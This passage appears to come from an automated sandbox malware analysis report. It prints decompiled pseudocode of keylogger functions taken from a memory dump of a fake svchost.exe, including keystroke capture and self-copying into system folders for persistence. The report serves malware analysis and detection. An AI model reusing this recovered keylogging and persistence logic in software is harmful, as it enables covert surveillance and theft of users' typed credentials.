				asm("enter 0xe000, 0x5c");
				asm("enter 0xf100, 0x5c");
				asm("enter 0x200, 0x5d");
				asm("enter 0x1300, 0x5d");
				asm("enter 0x2400, 0x5d");
				asm("enter 0x3500, 0x5d");
				asm("enter 0x4600, 0x5d");
				asm("enter 0x5700, 0x5d");
				asm("enter 0x6800, 0x5d");
				asm("enter 0x7600, 0x5d");
				asm("enter 0x8400, 0x5d");
				asm("enter 0x9200, 0x5d");
				asm("enter 0xa000, 0x5d");
				asm("enter 0xae00, 0x5d");
				asm("enter 0xbc00, 0x5d");
				asm("enter 0xca00, 0x5d");
				asm("enter 0xd800, 0x5d");
				asm("enter 0xe600, 0x5d");
				asm("enter 0x8b00, 0xc7");
				E00C81BB4(_t131, L"[Numpad +]");
				if(E00C81D04( *_t131) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *_t131) > 0 && E00C81F1C(L"Numpad",  *_t131) <= 0) {
					_t98 = 1;
					E00C81BB4(_t131, L"KeyDelBackspace");
				}
				 *((char*)(_t148 - 5)) = E00C854EC();
				_t141 = ToUnicodeEx( *(_t148 - 2) & 0x0000ffff,  *(_t148 - 4) & 0x0000ffff, _t148 - 0x105, _t148 - 0x310, 0x100, 0,  *(_t148 + 0xc));
				if(_t141 <= 0) {
					__eflags = _t141;
					if(_t141 < 0) {
						 *0xc8deec =  *(_t148 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t148 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t148 - 0x105, 0x40 << 2);
						_t131 = _t131;
						_t143 = _t141;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t143;
						if(_t143 < 0) {
							do {
								_t69 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t148 - 0x410, _t148 - 0x310, 0x100, 0,  *(_t148 + 0xc));
								__eflags = _t69;
							} while (_t69 < 0);
						}
					}
				} else {
					memcpy(_t148 - 0x210, 0xc8deec, 0x42 << 2);
					_t131 = _t131;
					if(E00C81D04( *_t131) == 0) {
						E00C81CD8(_t131, 0x80, _t148 - 0x310);
						_t162 =  *((char*)(_t148 - 5));
						if( *((char*)(_t148 - 5)) != 0) {
							E00C85148( *_t131, _t98, 0x80, _t148 - 0x418, _t131, 0xc8deec, __eflags);
							E00C81BB4(_t131,  *((intOrPtr*)(_t148 - 0x418)));
						} else {
							E00C850CC( *_t131, _t98, 0x80, _t148 - 0x414, _t131, 0xc8deec, _t162);
							E00C81BB4(_t131,  *((intOrPtr*)(_t148 - 0x414)));
						}
					}
					_t73 =  *(_t148 - 0x210);
					if(_t73 != 0) {
						ToUnicodeEx(_t73,  *(_t148 - 0x20c), _t148 - 0x208, _t148 - 0x310, 0x100, 0,  *(_t148 + 0xc));
					}
					E00C8291C();
				}
				if(_t98 == 1) {
					E00C81B78(_t131);
				}
				_pop(_t113);
				 *[fs:eax] = _t113;
				_push(E00C85FC6);
				return E00C81B90(_t148 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Numpad +], xrefs: 00C8583C

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C84914, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180

C-Code - Quality: 77%

			E00C84914(void* __eax, intOrPtr __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _v1520;
				char _v1542;
				char _v1564;
				char _v1566;
				void _v6176;
				char _v6180;
				char _v6184;
				intOrPtr _t29;
				void* _t35;
				void* _t39;
				int _t45;
				void* _t55;
				int _t61;
				intOrPtr _t85;
				void* _t87;
				intOrPtr _t102;
				void* _t106;
				WCHAR* _t131;
				void* _t134;

				_t101 = __edx;
				_t85 = __ebx;
				_push(__eax);
				_push(__ebx);
				_v6184 = 0;
				_v6180 = 0;
				_t131 = memcpy( &_v6176, __edx, 0x607 << 2);
				_push(_t134);
				_push(0xc84b74);
				_push( *[fs:eax]);
				 *[fs:eax] = _t134 + 0xffffffffffffe7ec;
				if(_v1566 == 0) {
					L26:
					_pop(_t102);
					 *[fs:eax] = _t102;
					_push(E00C84B7B);
					return E00C81770( &_v6184, 2);
				} else {
					_t29 = _v1520;
					if(_t29 != 0) {
						__eflags = _t29 - 1;
						if(_t29 != 1) {
							__eflags = _t29 - 2;
							if(_t29 != 2) {
								__eflags = _t29 - 3;
								if(_t29 != 3) {
									__eflags = _t29 - 4;
									if(__eflags != 0) {
										__eflags = _t29 - 5;
										if(_t29 == 5) {
											_t85 = E00C82FE0();
										}
									} else {
										_t85 = E00C833A8(E00C8310C(), E00C84B84, __eflags);
									}
								} else {
									__eflags = E00C83100();
									if(__eflags == 0) {
										_t85 = E00C833A8(E00C8310C(), E00C84B84, __eflags);
									} else {
										_t85 = E00C833A8(E00C83100(), E00C84B84, __eflags);
									}
								}
							} else {
								_t85 = E00C83060(_t101);
							}
						} else {
							E00C83034();
							_t85 = _t29;
						}
					} else {
						_t85 = E00C83008();
					}
					E00C81970( &_v6180, 0xb,  &_v1542);
					_t140 = _v6180;
					if(_v6180 != 0) {
						_t85 = E00C833A8(E00C833A8(_t85,  &_v1542, _t140), E00C84B84, _t140);
					}
					_push(E00C833A8(_t85,  &_v1564, _t140));
					_t35 = E00C82E48(_t131);
					_pop(_t106);
					if(E00C83960(_t131, _t35 + _t35, _t106) != 1) {
						_t39 = E00C834C4(_t85);
						_t142 = _t39;
						if(_t39 != 0) {
							SetFileAttributesW(E00C833A8(_t85,  &_v1564, _t142), 0x80);
							_t45 = CopyFileW(_t131, E00C833A8(_t85,  &_v1564, _t142), 0);
							asm("sbb eax, eax");
							_t144 = _t45 + 1;
							if(_t45 + 1 != 0) {
								E00C833A8(_t85,  &_v1564, __eflags);
							} else {
								_t87 = E00C833A8(E00C8310C(), E00C84B84, _t144);
								E00C81970( &_v6184, 0xb,  &_v1542);
								_t145 = _v6184;
								if(_v6184 != 0) {
									_t87 = E00C833A8(E00C833A8(_t87,  &_v1542, _t145), E00C84B84, _t145);
								}
								_t55 = E00C834C4(_t87);
								_t146 = _t55;
								if(_t55 != 0) {
									SetFileAttributesW(E00C833A8(_t87,  &_v1564, _t146), 0x80);
									_t61 = CopyFileW(_t131, E00C833A8(_t87,  &_v1564, _t146), 0);
									asm("sbb eax, eax");
									_t148 = _t61 + 1;
									if(_t61 + 1 != 0) {
										E00C833A8(_t87,  &_v1564, _t148);
									}
								}
							}
						}
					}
					goto L26;
				}
			}

APIs

SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000080), ref: 00C84B11

Part of subcall function 00C83060: VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,svchost.exe,00000000,00C8498E,00000000,00C84B74,?,00C8E07C,00000000,00000000), ref: 00C83077

Part of subcall function 00C83034: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00C83044

CopyFileW.KERNEL32(svchost.exe,00000000,00000000), ref: 00C84B27

Part of subcall function 00C82FE0: VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,00C849F0,00000000,00C84B74,?,00C8E07C,00000000,00000000), ref: 00C82FEF
Part of subcall function 00C82FE0: GetTempPathW.KERNEL32(00000104,00000000), ref: 00C82FFC

Part of subcall function 00C833A8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,?,?,00C89CE6,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C833D1

Part of subcall function 00C834C4: lstrlenW.KERNEL32(00000000), ref: 00C834EB
Part of subcall function 00C834C4: CreateDirectoryW.KERNEL32(?,00000000,00000000), ref: 00C83583

SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00C84A79
CopyFileW.KERNEL32(svchost.exe,00000000,00000000), ref: 00C84A8F

Part of subcall function 00C83008: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00C83018

Strings

svchost.exe, xrefs: 00C8491D, 00C84A8E, 00C84B26

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85A9E, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85A9E(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F1]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[F1], xrefs: 00C85AA0

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85D57, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85D57(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Page Up]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Page Up], xrefs: 00C85D59

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85A8D, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85A8D(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[End]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[End], xrefs: 00C85A8F

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C8587E, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C8587E(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Esc]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Esc], xrefs: 00C85880

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85D24, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85D24(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Num Lock]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
